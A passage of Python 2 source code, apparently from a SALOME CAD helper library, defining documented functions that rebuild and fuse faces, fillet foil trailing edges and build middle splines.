Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# dim
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 2
Returned Values:
"dim" value: 0
"single" value: False
Type: Vertex
Number: n
Name: "RebuiltFace (Vertex)"
"dim" value: 0
"single" value: True
Type: Compound of Vertexes
Number: 1
Name: "RebuiltFace (Vertexes)"
"dim" value: 1
"single" value: False
Type: Edge
Number: n
Name: "RebuiltFace (Edge)"
"dim" value: 1
"single" value: True
Type: Compound of Edges
Number: 1
Name: "RebuiltFace (Edges)"
"dim" value: 2
"single" value: -
Type: Face
Number: 1
Name: "RebuiltFace"
Conditions of use:
-
"""
if isinstance(np, str): print "[X] The first argument (np) should be an integer ."; return
if dim not in [0, 1, 2]: print "[X] There is no shape to return corresponding to the given dimension."; return
# Get the input shape(s)
face = GetGUISelection(face)
face = GetObject(face)
#-
# Make this function recursive
if isinstance(face, list):
return_list = []
for sub_object in face:
return_list.append(RebuildFace(np, sub_object, rel, switch, tol, single, add, infa, dim))
return return_list
#-
# Get input values
if isinstance(np, list) == False:
np = [np, np]
#-
# Check the input shape existence
if "error" in [face] or None in [face]: return
#-
# Set father object
father = None
if infa == True: father = face
#-
if False: pass
else:# All checks done
# Get the sub-shapes
face = GetSubShapes(face)
#-
# Create the iso curves
iso_curves = []
if dim == 0: iso_curve_vertexes_all = []
for i in [n / float(np[0]) for n in range(np[0] + 1)]:
iso_curve_vertexes = []
for j in [n / float(np[1]) for n in range(np[1] + 1)]:
if switch == True:
new_iso_curve_vertex = geompy.MakeVertexOnSurface(face[-1], j, i)
else:
new_iso_curve_vertex = geompy.MakeVertexOnSurface(face[-1], i, j)
iso_curve_vertexes.append(new_iso_curve_vertex)
if dim == 0: iso_curve_vertexes_all += iso_curve_vertexes
if dim != 0:
new_iso_curve = geompy.MakeInterpol(iso_curve_vertexes)
iso_curves.append(new_iso_curve)
#-
if dim == 0:
to_return = iso_curve_vertexes_all
to_return_name = "RebuiltFace (Vertex)"
if single == True:
# Put them into a compound
vertex_compound = geompy.MakeCompound(iso_curve_vertexes_all)
#-
to_return = vertex_compound
to_return_name = "RebuiltFace (Vertexes)"
else:
# Put them into a compound
iso_curve_compound = geompy.MakeCompound(iso_curves)
#-
if dim == 1:# If the output dimension is 1...
to_return = iso_curves
to_return_name = "RebuiltFace (Edge)"
if single == True:
to_return = iso_curve_compound
to_return_name = "RebuiltFace (Edges)"
else:# If the output dimension is 2...
# Create the filling from this compound
filling = geompy.MakeFilling(iso_curve_compound, theMinDeg = 10, theMaxDeg = 20, theTol2D = 1e-5, theTol3D = 1e-5)
#-
# Relimitate the filling
# TODO improve that ?
rebuild_face = filling
if rel == True:
#face_wire = geompy.SubShapeAll(face[-1], geompy.ShapeType["WIRE"])[0]
#fused_face = geompy.MakeFaceFromSurface(filling, face_wire)
projected_edges = []
for edge in face[1]:
try:
projected_edge = geompy.MakeProjection(edge, filling)
projected_edges.append(projected_edge)
except:
pass
if len(projected_edges) > 0:
filling_partition = geompy.MakePartition([filling], projected_edges)
filling_partition_faces = geompy.SubShapeAll(filling_partition, geompy.ShapeType["FACE"])
for filling_partition_face in filling_partition_faces:
filling_partition_face_vertexes = geompy.SubShapeAll(filling_partition_face, geompy.ShapeType["VERTEX"])
match = True
for filling_partition_face_vertex in filling_partition_face_vertexes:
projected_edge_compound = geompy.MakeCompound(projected_edges)
min_distance = geompy.MinDistance(filling_partition_face_vertex, projected_edge_compound)
if min_distance > tol:
match = False
if match == True:
rebuild_face = filling_partition_face
break
#-
to_return = rebuild_face
to_return_name = "RebuiltFace"
# Add and return the resulting shape(s)
if add == True:
slow_add = False
if not isinstance(to_return, list) or single == True: slow_add = True
AddToStudy(to_return, to_return_name, father, suffix = slow_add, refresh = slow_add)
if slow_add == False:
if salome.sg.hasDesktop():
salome.sg.updateObjBrowser(1)
return to_return
#-
rf = RebuildFace
def FuseCoplanarFaces( faces = [None], add = True ):
"""
Description:
Completely fuses two coplanar faces.
Arguments:
# faces
Description: The faces to fuse.
Type: List of 2 Faces
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: [None]
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
Returned Values:
"dim" value: -
"single" value: -
Type: Face
Number: 1
Name: "FusedFace"
Conditions of use:
-
"""
if isinstance(faces, list) == False: print "[X] The first argument (faces) should be an array."; return
# Get the input shape(s)
faces = GetGUISelection(faces)
faces = GetObject(faces)
#-
# Check the input shape existence
if "error" in faces or None in faces: return
#-
# Check the number of selected objects
if len(faces) != 2:
print "[X] Two shapes should be selected."
return
#-
else:# All checks done
# Get the plane normal
normal = geompy.GetNormal(faces[0])
#-
# Extrude the faces
extrusion_distance = 1e3
cutting_plane_position = extrusion_distance / 2
extruded_faces = [
geompy.MakePrismVecH(faces[0], normal, extrusion_distance),
geompy.MakePrismVecH(faces[1], normal, extrusion_distance)
]
#-
# Fuse the extruded faces
fused_extension = geompy.MakeFuse(extruded_faces[0], extruded_faces[1])
#-
# Get the length of the cutting plane
bounding_box = geompy.BoundingBox(fused_extension)
dx = abs(bounding_box[1] - bounding_box[0])
dy = abs(bounding_box[2] - bounding_box[1])
dz = abs(bounding_box[3] - bounding_box[2])
plane_length = 2 * dx + 2 * dy + 2 * dz
#-
# Create the cutting plane
cutting_plane = geompy.MakePlaneFace(faces[0], plane_length)
cutting_plane = geompy.MakeTranslationVectorDistance(cutting_plane, normal, cutting_plane_position)
#-
# Cut the fused extrusion with the plane
fused_face = geompy.MakeCommon(fused_extension, cutting_plane)
#-
# Remove shells (optional)
random_vertex = geompy.MakeVertex(0, 0, 0)# This vertex is only used to make the below partition possible
fused_face = geompy.MakePartition([fused_face], [random_vertex], Limit = geompy.ShapeType["FACE"])
#-
# Move the face to the original position
fused_face = geompy.MakeTranslationVectorDistance(fused_face, normal, - cutting_plane_position)
#-
# Add and return the resulting shape(s)
if add == True:
AddToStudy(fused_face, "FusedFace")
return fused_face
#-
fcf = FuseCoplanarFaces
def FuseShellFaces( shell = None, np = 400, strat = "rigid", curv = True, add = True, infa = False, dim = 2 ):
"""
Description:
Creates a single face from a shell.
Arguments:
# shell
Description: The shell to fuse.
Type: Shell
GUI selection: yes
Selection by name: yes
Recursive: yes
Default value: [None]
# np
Description: See here. In this case, the number of point is approximatively respected.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 400
# strat
Description: The strategy. If equals "flex", the function tries to insert smooth transitions between sub-faces of the input shell (the boundary wire is then modified). Equals "rigid" otherwise (necessitates the input sub-faces to be as tangential as possible).
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: "rigid"
# curv
Description: See here. In this case, applies only for the boundary wire reconstruction when strat equals "flex".
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
Returned Values:
"dim" value: 0
"single" value: -
Type: Compound of Vertexes
Number: 1
Name: "FusedShell (Vertexes)"
"dim" value: 2
"single" value: -
Type: Face
Number: 1
Name: "FusedShell"
Conditions of use:
The shell should have only one boundary wire.
Also, to be fused efficiently, the shell faces should have reasonable aspect ratio and local curvature.
"""
if isinstance(np, str): print "[X] The first argument (np) should be an integer ."; return
if dim not in [0, 2]: print "[X] There is no shape to return corresponding to the given dimension."; return
# Get the input shape(s)
shell = GetGUISelection(shell)
shell = GetObject(shell)
#-
# Make this function recursive
if isinstance(shell, list):
return_list = []
for sub_object in shell:
return_list.append(FuseShellFaces(sub_object, np, strat, curv, add, infa, dim))
return return_list
#-
# Check the input shape existence
if "error" in [shell] or None in [shell]: return
#-
# Set father object
father = None
if infa == True: father = shell
#-
if False: pass
else:# All checks done
# Check if the input shape is "shell-shaped"
shell_faces = GetSubShapes(shell)[2]
try:
shell = geompy.MakeShell(shell_faces)
except:
print "[X] The input 2D shape should be \"shell-shaped\"."; return
#-
# Get the input shell boundary wire
boundary_wire = geompy.GetFreeBoundary(shell)[1][0]
#-
# Get the input shell area
area = geompy.BasicProperties(shell)[1]
#-
# Get the cell size
cell_size = math.sqrt(area / np)
#-
# Mesh the input shell
mesh = smesh.Mesh(shell)
netgen_algo = mesh.Triangle(algo = smeshBuilder.NETGEN_1D2D)
netgen_hypo = netgen_algo.Parameters()
netgen_hypo.SetMinSize(cell_size)
netgen_hypo.SetMaxSize(cell_size)
netgen_hypo.SetFineness(2)
mesh.Compute()
#-
# Remove internal vertexes
if strat == "flex":# not "rigid"
# Get the internal edges
all_edges_group = PutAllSubShapesInAGroup(1, shell, add = False)
internal_edge_compound = geompy.MakeCut(all_edges_group, boundary_wire)
geompy.addToStudy(internal_edge_compound, "internal_edges")
#-
# Create the internal node mesh group
internal_nodes_mesh_filter = smesh.GetFilterFromCriteria([smesh.GetCriterion(SMESH.NODE, SMESH.FT_BelongToGeom, SMESH.FT_Undefined, internal_edge_compound)])
internal_nodes_mesh_filter.SetMesh(mesh.GetMesh())
internal_nodes_mesh_group = mesh.GroupOnFilter(SMESH.NODE, "internal_nodes", internal_nodes_mesh_filter)
#-
# Delete the internal nodes
mesh.RemoveGroupWithContents(internal_nodes_mesh_group)
#mesh.RemoveGroupWithContents(edge_node_mesh_group)
#-
# Delete temporary geometrical shapes
#http://www.salome-platform.org/forum/forum_10/366900504#419952388
so = salome.ObjectToSObject(internal_edge_compound)
sb = salome.myStudy.NewBuilder()
sb.RemoveObjectWithChildren(so)
#-
#-
# Create the node group
node_group = mesh.CreateEmptyGroup( SMESH.NODE, "nodes" )
node_group.AddFrom(mesh.GetMesh())
#-
# Create vertexes from nodes
vertex_compound = MakeVertexesFromMeshGroup(node_group, add = False)
#-
# Delete the shell, mesh and hypos
so = salome.ObjectToSObject(shell)
sb = salome.myStudy.NewBuilder()
sb.RemoveObjectWithChildren(so)
a_study_builder = salome.myStudy.NewBuilder()
SO = salome.myStudy.FindObjectIOR(salome.myStudy.ConvertObjectToIOR(node_group))
if SO: a_study_builder.RemoveObjectWithChildren(SO)
SO = salome.myStudy.FindObjectIOR(salome.myStudy.ConvertObjectToIOR(mesh.GetMesh()))
if SO: a_study_builder.RemoveObjectWithChildren(SO)
SO = salome.myStudy.FindObjectIOR(salome.myStudy.ConvertObjectToIOR(netgen_hypo))
if SO: a_study_builder.RemoveObjectWithChildren(SO)
#-
if dim == 0:# If the output dimension is 0...
# Return the resulting shape(s)
if add == True:
AddToStudy(vertex_compound, "FusedShell (Vertexes)", father)
return vertex_compound
#-
else:
# Create the smoothing surface
vertex_list = geompy.SubShapeAll(vertex_compound, geompy.ShapeType["VERTEX"])
smoothing_surface = geompy.MakeSmoothingSurface(vertex_list, 100, 15)
#-
if strat == "flex":# not "rigid"
zero_size = cell_size / 100.0
# Get boundary vertexes to ignore
boundary_vertexes = GetSubShapes(boundary_wire)[0]
vertexes_to_ignore = []
for boundary_vertex in boundary_vertexes:
distance = geompy.MinDistance(boundary_vertex, vertex_compound)
if distance > zero_size:
vertexes_to_ignore.append(boundary_vertex)
#-
# Fuse boundary edges
boundary_edges = GetSubShapes(boundary_wire)[1]
new_boundary_edges = []
for vertex_to_ignore in vertexes_to_ignore:# For each vertex to ignore...
# Get touching boundary edges
touching_edges = []
for boundary_edge in boundary_edges:
distance = geompy.MinDistance(boundary_edge, vertex_to_ignore)
if distance < zero_size:
touching_edges.append(boundary_edge)
#-
# Create new boundary edges
max_nb_touching_vertexes = 0
new_boundary_separated_edges = []
for touching_edge in touching_edges:# For each touching edge...
# Get touching vertexes
touching_vertexes = []
for vertex in vertex_list:
distance = geompy.MinDistance(vertex, touching_edge)
if distance < zero_size:
touching_vertexes.append(vertex)
#-
nb_touching_vertexes = len(touching_vertexes)
if nb_touching_vertexes > max_nb_touching_vertexes:
max_nb_touching_vertexes = nb_touching_vertexes
# Create a spline from them
touching_vertex_compound = geompy.MakeCompound(touching_vertexes)
new_boundary_separated_edge = MakeCurveFromUnsortedVertexes([touching_vertex_compound, vertex_to_ignore], add = False)
new_boundary_separated_edges.append(new_boundary_separated_edge)
#-
#-
# Fuse them together
new_boundary_edge = FuseSplines(new_boundary_separated_edges, np = max_nb_touching_vertexes, curv = curv, add = False)
new_boundary_edges.append(new_boundary_edge)
#-
#-
# Replace the boundary wire
boundary_wire = geompy.MakeWire(new_boundary_edges)
#-
# Relimitate the smoothing surface
fused_face = geompy.MakeFaceFromSurface(smoothing_surface, boundary_wire)
#-
# Add and return the resulting shape(s)
if add == True:
AddToStudy(fused_face, "FusedShell", father)
return fused_face
#-
fsf = FuseShellFaces
def FuseGroupFaces( group = None, np = 400, add = True ):
"""
Description:
Fuse faces inside a face group, be it in a solid or a shell.
Arguments:
# group
Description: The face group to fuse.
Type: Group of Faces
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: [None]
# np
Description: See here. In this case, the number of point is approximatively respected.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 400
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
Returned Values:
"dim" value: -
"single" value: -
Type: Solid or Shell
Number: 1
Name: "SolidWithFusedGroup" or "ShellWithFusedGroup"
Conditions of use:
-
"""
if isinstance(np, str): print "[X] The first argument (np) should be an integer ."; return
# Get the input shape(s)
group = GetGUISelection(group, uniq = True)
group = GetObject(group)
#-
# Check the input shape existence
if "error" in [group] or None in [group]: return
#-
if False: pass
else:# All checks done
# Get the parent shape
main_shape = group.GetMainShape()
#-
# Get the main shape type
nb_faces = geompy.NumberOfFaces(main_shape)
nb_solids = geompy.NumberOfSolids(main_shape)
main_shape_type = None
if nb_solids == 1:
main_shape_type = "solid"
elif nb_solids == 0:
if nb_faces > 0:
main_shape_type = "shell"
if main_shape_type == None:
print "[X] The main shape should be a solid or a shell."; return
#-
# Fuse all faces in the group
fused_face = FuseShellFaces(group, np, add = False)
#-
# Create a group of resting faces
all_faces_group = geompy.CreateGroup(main_shape, geompy.ShapeType["FACE"])
solid_face_list = geompy.SubShapeAll(main_shape, geompy.ShapeType["FACE"])
for face in solid_face_list:
face_id = geompy.GetSubShapeID(main_shape, face)
geompy.AddObject(all_faces_group, face_id)
resting_group = geompy.CutGroups(all_faces_group, group)
#-
# Create a new shell
new_shell = geompy.MakeShell([resting_group, fused_face])
#-
if main_shape_type == "shell":
# Add and return the resulting shape(s)
if add == True:
AddToStudy(new_shell, "ShellWithFusedGroup")
return new_shell
#-
else:
# Create a solid from the shell
new_solid = geompy.MakeSolid([new_shell])
#-
# Add and return the resulting shape(s)
if add == True:
AddToStudy(new_solid, "SolidWithFusedGroup")
return new_solid
#-
fgf = FuseGroupFaces
def RemoveFaceExtraEdges( face = None, tol = 1e-7, add = True, infa = False ):
"""
Description:
Removes zero-length edges in a face.
Arguments:
# face
Description: The face from which to remove extra edges.
Type: Face
GUI selection: yes
Selection by name: yes
Recursive: yes
Default value: None
# tol
Description: See here.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1e-7
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
Returned Values:
"dim" value: -
"single" value: -
Type: Face
Number: 1
Name: "FaceWithoutExtraEdges"
Conditions of use:
-
"""
# Get the input shape(s)
face = GetGUISelection(face)
face = GetObject(face)
#-
# Make this function recursive
if isinstance(face, list):
return_list = []
for sub_object in face:
return_list.append(RemoveFaceExtraEdges(sub_object, tol, add, infa))
return return_list
#-
# Check the input shape existence
if "error" in [face] or None in [face]: return
#-
# Set father object
father = None
if infa == True: father = face
#-
if False: pass
else:# All checks done
# Get the face normal
normal = geompy.GetNormal(face)
#-
# Extrude the face_name
extruded_face = geompy.MakePrismVecH(face, normal, 1000)
#-
# Remove the extra edges
fixed_solid = geompy.RemoveExtraEdges(extruded_face)
#-
# Get the faces
exploded_faces = geompy.SubShapeAll(fixed_solid, geompy.ShapeType["FACE"])
#-
# Get the fixed face
for exploded_face in exploded_faces:
vertexes = geompy.SubShapeAll(exploded_face, geompy.ShapeType["VERTEX"])
match = True
for vertex in vertexes:
min_distance = geompy.MinDistance(vertex, face)
if min_distance > tol:
match = False
if match == True:
fixed_face = exploded_face
break
#-
# Add and return the resulting shape(s)
if add == True:
AddToStudy(fixed_face, "FaceWithoutExtraEdges", father)
return fixed_face
#-
rfee = RemoveFaceExtraEdges
def MakeFoilTrailingFillets( thick, wire = None, angle = 25, tol = 1e-7, add = True, infa = False ):
"""
Description:
Add a trailing fillet to a foil wire.
Arguments:
# thick
Description: The desired approximative trailing edge thickness.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: -
# wire
Description: The input foil.
Type: Wire
GUI selection: yes
Selection by name: yes
Recursive: yes
Default value: None
# angle
Description: The angle in degrees between two touching sub-edges below which a fillet has to be done.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 25
# tol
Description: See here.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1e-7
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
Returned Values:
"dim" value: -
"single" value: -
Type: Face
Number: 1
Name: "FoilWithTrailingFillet"
Conditions of use:
The input foil should be a planar closed wire having no trailing edge thickness, that is having (a) sharp trailing edge(s) ending by a vertex common to the upper and lower edges of the foil.
"""
input_shape = wire
# Get the input shape(s)
input_shape = GetGUISelection(input_shape)
input_shape = GetObject(input_shape)
#-
# Make this function recursive
if isinstance(input_shape, list):
return_list = []
for sub_object in input_shape:
return_list.append(MakeFoilTrailingFillets(thick, sub_object, angle, add, infa))
return return_list
#-
# Check the input shape existence
if "error" in [input_shape] or None in [input_shape]: return
#-
# Set father object
father = None
if infa == True: father = input_shape
#-
wire = input_shape
if False: pass
else:# All checks done
small_value = 1e-3
wire_length = geompy.BasicProperties(wire)[0]
infinite_distance = 1e2 * wire_length
cut_plane_size = 3 * thick
wire_edges = GetSubShapes(wire)[1]
try:
wire = geompy.MakeWire(wire_edges)
except:
print "[X] The input shape should be \"wire-shaped\"."; return
# Check the wire is closed
if GetBoundaryVertexes(wire, add = False) != None:
print "[X] The input wire should be closed."; return
#-
# Create a face from the wire
wire_face = geompy.MakeFace(wire, isPlanarWanted = True)
#-
# Get vertexes
wire_vertex_list = GetSubShapes(wire)[0]
#-
# Get trailing vertexes
trailing_vertex_list = []
cut_normal_list = []
thickness_slope_list = []
for vertex in wire_vertex_list:# For each vertex of the wire...
# Get the edge(s) touching the vertex
touching_edge_compound = geompy.GetShapesNearPoint(wire, vertex, geompy.ShapeType["EDGE"])
touching_edge_list = geompy.SubShapeAll(touching_edge_compound, geompy.ShapeType["EDGE"])
#-
# Create local edge direction vectors
direction_vector_list = []
if len(touching_edge_list) == 1:
touching_edge = touching_edge_list[0]
direction_vector_tip_vertex_1 = geompy.MakeVertexOnCurve(touching_edge, 0.0 + small_value)
direction_vector_tip_vertex_2 = geompy.MakeVertexOnCurve(touching_edge, 1.0 - small_value)
direction_vector_1 = geompy.MakeVector(vertex, direction_vector_tip_vertex_1)
direction_vector_2 = geompy.MakeVector(vertex, direction_vector_tip_vertex_2)
direction_vector_list.append(direction_vector_1)
direction_vector_list.append(direction_vector_2)
else:
for touching_edge in touching_edge_list:
direction_vector_tip_vertex_parameter_1 = 0.0 + small_value
direction_vector_tip_vertex_parameter_2 = 1.0 - small_value
vertex_1 = geompy.MakeVertexOnCurve(touching_edge, 0.0)
vertex_2 = geompy.MakeVertexOnCurve(touching_edge, 1.0)
distance_1 = geompy.MinDistance(vertex_1, vertex)
distance_2 = geompy.MinDistance(vertex_2, vertex)
direction_vector_vertex_list = []
if distance_2 > distance_1:
direction_vector_tip_vertex = geompy.MakeVertexOnCurve(touching_edge, 0.0 + small_value)
else:
direction_vector_tip_vertex = geompy.MakeVertexOnCurve(touching_edge, 1.0 - small_value)
direction_vector = geompy.MakeVector(vertex, direction_vector_tip_vertex)
direction_vector_list.append(direction_vector)
#-
# Detect sharp angles
[direction_vector_1, direction_vector_2] = direction_vector_list
local_angle = geompy.GetAngle(direction_vector_1, direction_vector_2)
if local_angle < angle:
# Check if this is an open or closed angle
tmp_vertex_1 = geompy.MakeVertexOnCurve(direction_vector_1, 1.0)
tmp_vertex_2 = geompy.MakeVertexOnCurve(direction_vector_2, 1.0)
tmp_edge = geompy.MakeEdge(tmp_vertex_1, tmp_vertex_2)
tmp_vertex = geompy.MakeVertexOnCurve(tmp_edge, 0.5)
distance = geompy.MinDistance(tmp_vertex, wire_face)
if distance > tol:
continue
#-
# Get the cut normal
normalized_direction_vector_1 = GetNormalizedVector(direction_vector_1, add = False)
normalized_direction_vector_2 = GetNormalizedVector(direction_vector_2, add = False)
tip_vertex_1 = geompy.MakeVertexOnCurve(normalized_direction_vector_1, 1)
tip_vertex_2 = geompy.MakeVertexOnCurve(normalized_direction_vector_2, 1)
tmp_edge = geompy.MakeEdge(tip_vertex_1, tip_vertex_2)
cut_normal_tip_vertex = geompy.MakeVertexOnCurve(tmp_edge, 0.5)
cut_normal = geompy.MakeVector(vertex, cut_normal_tip_vertex)
#-
# Get the local thickness slope
local_thickness = geompy.BasicProperties(tmp_edge)[0]
delta_x = geompy.BasicProperties(cut_normal)[0]
thickness_slope = local_thickness / delta_x
thickness_slope_list.append(thickness_slope)
#-
trailing_vertex_list.append(vertex)
cut_normal_list.append(cut_normal)
#-
#-
final_wire = wire
# Create trailing fillings
for i in range(len(trailing_vertex_list)):# For each trailing vertex...
trailing_vertex = trailing_vertex_list[i]
cut_normal = cut_normal_list[i]
thickness_slope = thickness_slope_list[i]
# Create the cutting plane
cutting_plane = geompy.MakePlane(trailing_vertex, cut_normal, cut_plane_size)
#-
# Cut the wire
cut_position = thick / thickness_slope
cutting_plane = geompy.MakeTranslationVectorDistance(cutting_plane, cut_normal, cut_position)
extrusion = geompy.MakePrismVecH(cutting_plane, cut_normal, - infinite_distance)
cut_wire = geompy.MakeCut(final_wire, extrusion)
#-
# Close the cut wire
boundary_vertex_list = GetBoundaryVertexes(cut_wire, add = False, single = False)
closing_edge = geompy.MakeEdge(boundary_vertex_list[0], boundary_vertex_list[1])
try:
closed_wire = geompy.MakeWire([cut_wire, closing_edge])
except:
print "[X] A \"make wire\" operation failed on a rebuilt wire."
if add == True:
AddToStudy([cut_wire, closing_edge], "ProblematicShapes")
return [cut_wire, closing_edge]
#-
# Get the trailing vertexes IDs
boundary_vertex_id_list = []
for boundary_vertex in boundary_vertex_list:
boundary_vertex_id = geompy.GetSubShapeID(closed_wire, boundary_vertex)
boundary_vertex_id_list.append(boundary_vertex_id)
#-
# Make first fillets
radius_1 = thick / 4.0
radius_2 = thick / 3.0
try:
fillet_1 = geompy.MakeFillet1D(closed_wire, radius_1, boundary_vertex_id_list, doIgnoreSecantVertices = False)
fillet_2 = geompy.MakeFillet1D(closed_wire, radius_2, boundary_vertex_id_list, doIgnoreSecantVertices = False)
except:
print "[X] Fillet operations failed on the cut wire."
if add == True:
AddToStudy(closed_wire, "ProblematicShape")
return closed_wire
#-
# Get the fillets trailing edge lengths
trailing_edge_middle_vertex = geompy.MakeVertexOnCurve(closing_edge, 0.5)
trailing_edge_1 = geompy.GetShapesNearPoint(fillet_1, trailing_edge_middle_vertex, geompy.ShapeType["EDGE"])
trailing_edge_2 = geompy.GetShapesNearPoint(fillet_2, trailing_edge_middle_vertex, geompy.ShapeType["EDGE"])
trailing_edge_thickness_1 = geompy.BasicProperties(trailing_edge_1)[0]
trailing_edge_thickness_2 = geompy.BasicProperties(trailing_edge_2)[0]
#-
# Deduce a better fillet radius
trailing_edge_thickness_slope = (trailing_edge_thickness_2 - trailing_edge_thickness_1) / (radius_2 - radius_1)
radius_3 = (radius_1 * trailing_edge_thickness_slope - trailing_edge_thickness_1) / trailing_edge_thickness_slope
#-
# Create the final fillet
fillet_3 = geompy.MakeFillet1D(closed_wire, radius_3 * .99, boundary_vertex_id_list, doIgnoreSecantVertices = False)
#-
# Remove the fillet trailing edge
trailing_edge_3 = geompy.GetShapesNearPoint(fillet_3, trailing_edge_middle_vertex, geompy.ShapeType["EDGE"])
trailing_edge_thickness_3 = geompy.BasicProperties(trailing_edge_3)[0]
final_wire = geompy.ProcessShape(fillet_3, ["DropSmallEdges"], ["DropSmallEdges.Tolerance3d"], [str(trailing_edge_thickness_3 * 1.1)])
#-
#-
# Add and return the resulting shape(s)
if add == True:
AddToStudy(final_wire, "FoilWithTrailingFillet")
return final_wire
#-
mftf = MakeFoilTrailingFillets
def MakeMiddleSpline( edges = [None], np = 20, cor = False, single = True, add = True, dim = 1 ):
"""
Description:
Creates a middle spline between two edges.
Arguments:
# edges
Description: The edges between which to build the middle edge.
Type: List of 2 Edges
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: [None]
# np
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 10
# cor
Description: If equals True, the edge orientation is automatically corrected.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# single
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# dim
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1
Returned Values:
"dim" value: 0
"single" value: False
Type: Vertex
Number: n
Name: "MiddleSpline (Vertex)"
"dim" value: 0
"single" value: True
Type: Compound of Vertexes
Number: 1
Name: "MiddleSpline (Vertexes)"
"dim" value: 1
"single" value: -
Type: Edge
Number: 1
Name: "MiddleSpline"
Conditions of use:
Input edges should not touch each other.
"""
if isinstance(np, str): print "[X] The first argument (np) should be an integer ."; return
if isinstance(edges, list) == False: print "[X] The second argument (edges) should be an array."; return
if dim > 1: print "[X] There is no shape to return corresponding to the given dimension."; return
# Get the input shape(s)
edges = GetGUISelection(edges)
edges = GetObject(edges)
#-
# Check the input shape existence
if "error" in edges or None in edges: return
#-
# Check the number of selected objects
if len(edges) != 2:
print "[X] Two shapes should be selected."
return
#-
else:# All checks done
# Get the sub-shapes
edges = GetSubShapes(edges)
#-
# Get the offset edge sense
reverse_parameter = False
if cor == True:
linking_edges = [
geompy.MakeEdge(edges[0][0][0], edges[1][0][0]),
geompy.MakeEdge(edges[0][0][0], edges[1][0][1])
]
linking_edge_lengths = [
geompy.BasicProperties(linking_edges[0])[0],
geompy.BasicProperties(linking_edges[1])[0]
]
if linking_edge_lengths[0] > linking_edge_lengths[1]:
reverse_parameter = True
#-
# Create the points
edge_vertexes = [[], []]
for parameter in [float(i) / (np - 1) for i in range(np)]:
edge_vertexes[0].append(geompy.MakeVertexOnCurve(edges[0][-1], parameter))
if reverse_parameter == True:
parameter = 1.0 - parameter
edge_vertexes[1].append(geompy.MakeVertexOnCurve(edges[1][-1], parameter))
#-
# Get the middle spline vertexes
nb_vertexes = len(edge_vertexes[0])
middle_vertexes = []
for i in range(nb_vertexes):
spline = geompy.MakeEdge(edge_vertexes[0][i], edge_vertexes[1][i])
middle_vertexes.append(geompy.MakeVertexOnCurve(spline, 0.5))
#-
if dim == 0:# If the output dimension is 0...
to_return = middle_vertexes
to_return_name = "MiddleSpline (Vertex)"
if single == True:
# Create the vertex compound
middle_vertex_compound = geompy.MakeCompound(middle_vertexes)
#-
to_return = middle_vertex_compound
to_return_name = "MiddleSpline (Vertexes)"
else:
# Create the middle spline
middle_spline = geompy.MakeInterpol(middle_vertexes)
#-
to_return = middle_spline
to_return_name = "MiddleSpline"
# Add and return the resulting shape(s)
if add == True:
slow_add = False
if not isinstance(to_return, list) or single == True: slow_add = True
AddToStudy(to_return, to_return_name, suffix = slow_add, refresh = slow_add)
if slow_add == False:
if salome.sg.hasDesktop():
salome.sg.updateObjBrowser(1)
return to_return
#-
mms = MakeMiddleSpline
def MakeCurveFromUnsortedVertexes( compound_and_start = [None], close = False, poly = False, single = True, add = True, infa = False, dim = 1):
"""
Description:
Creates a spline using a set of vertexes in random order, starting from a given vertex.
Arguments:
# compound_and_start
Description: The compound of vertexes describing the curve and the start vertex. For a closed curve, the start vertex is optional.
Type: List of 1 Compound of Vertexes + 1 Vertex
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: [None]
# close
Description: Defines if the curve has to be closed or not.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# poly
Description: If True, the output curve is a wire composed of straights edges. If False, the output curve is a single smooth edge.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# single
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# dim
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1
Returned Values:
"dim" value: 0
"single" value: False
Type: Vertex
Number: n
Name: "CurveFromUnstortedVertexes (Vertex)"
"dim" value: 0
"single" value: True
Type: Compound or Vertexes
Number: 1
Name: "CurveFromUnstortedVertexes (Vertexes)"
"dim" value: 1
"single" value: -
Type: Edge or Wire
Number: 1
Name: "CurveFromUnstortedVertexes"
Conditions of use:
-
"""
if dim not in [0, 1]: print "[X] There is no shape to return corresponding to the given dimension."; return
if isinstance(compound_and_start, list) == False: print "[X] The first argument (compound_and_start) should be an array."; return
# Get the input shape(s)
